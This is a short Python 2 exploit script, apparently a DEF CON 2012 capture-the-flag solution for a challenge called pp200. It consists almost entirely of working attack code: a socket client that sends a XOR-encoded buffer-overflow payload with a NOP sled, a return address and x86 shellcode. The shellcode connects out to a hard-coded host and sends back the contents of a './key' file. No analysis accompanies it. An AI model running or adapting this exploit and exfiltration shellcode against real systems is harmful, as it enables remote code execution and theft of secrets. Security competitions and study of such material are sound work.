defcon20 pp200 exploit

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

#!/usr/bin/python2.6 #defcon 2012, pp200 exploit - badcob   import socket, sys from struct import pack   def make_connection(host,port):     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     s.connect((host,port))     return s   #shellcode scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F" scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F" scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"   host = "192.168.74.134" port = 8912   num = "b74b9d86e6cd3480" + "\x0a" user_id = "a6" + "\x0a" ret = "\xbc\xe2\xbe\xbf"   #make payload temp = "\x90"*416+scode+"\x90"*17+"\x0f" temp += ret + "\x0a"   payload = ''   for x in temp:     a = ord(x)^0xa6     if a == 0xa:         print "failed"         break     payload += chr(a)   s = make_connection(host,port) s.send(num) print s.recv(128) s.send(user_id) print s.recv(128) s.send(payload)